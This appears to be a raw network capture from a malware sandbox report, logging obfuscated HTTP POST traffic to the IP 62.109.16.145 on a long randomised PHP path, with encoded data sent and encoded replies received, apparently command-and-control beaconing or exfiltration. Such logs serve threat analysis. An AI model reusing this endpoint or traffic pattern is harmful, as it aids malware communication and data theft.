Jan 9, 2025 04:12:31.450295925 CET	1044	OUT	Data Raw: 5a 53 59 51 5a 5c 58 5d 55 56 55 5a 56 58 55 51 56 51 5a 5c 55 52 53 5a 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZSYQZ\X]UVUZVXUQVQZ\URSZT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&_$)/ :'1.<.'43)!2:%V+'23)$( \%#Y)0
Jan 9, 2025 04:12:31.780750990 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:31.911560059 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:32.098917961 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:32.450290918 CET	1764	OUT	Data Raw: 5a 56 5c 5d 5a 5e 5d 5c 55 56 55 5a 56 59 55 56 56 56 5a 58 55 56 53 5e 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZV\]Z^]\UVUZVYUVVVZXUVS^T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%0,#+'22Y+?7#):&-S<?X&/)7+? \%#Y)
Jan 9, 2025 04:12:32.816584110 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:32.947113991 CET	380	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0c 1a 23 5d 35 5f 26 5a 2b 22 0e 02 28 02 28 0f 2a 32 3f 00 3c 30 26 03 29 3a 3d 00 29 3d 0a 0c 3f 05 29 03 33 0c 36 54 37 2e 2e 5c 23 30 2e 59 0c 1d 39 5a 29 5d 3a 52 25 0a 34 05 3e 0a 3a 58 35 0f 09 5a 30 58 2e 55 26 38 27 0d 3e 22 28 54 2a 32 28 0e 2f 28 2a 1f 30 0d 32 1a 26 3e 21 5e 02 14 23 5d 28 2d 2b 52 3e 19 20 05 25 1c 0c 57 37 3d 32 57 21 2b 3b 18 23 28 3d 05 29 31 2d 05 20 0f 38 13 30 1d 35 42 37 57 25 1c 3d 23 2f 5c 2b 03 2b 49 01 31 55 56 Data Ascii: #]5_&Z+"((2?<0&):=)=?)36T7..\#0.Y9Z)]:R%4>:X5Z0X.U&8'>"(T2(/(*02&>!^#](-+R> %W7=2W!+;#(=)1- 805B7W%=#/\++I1UV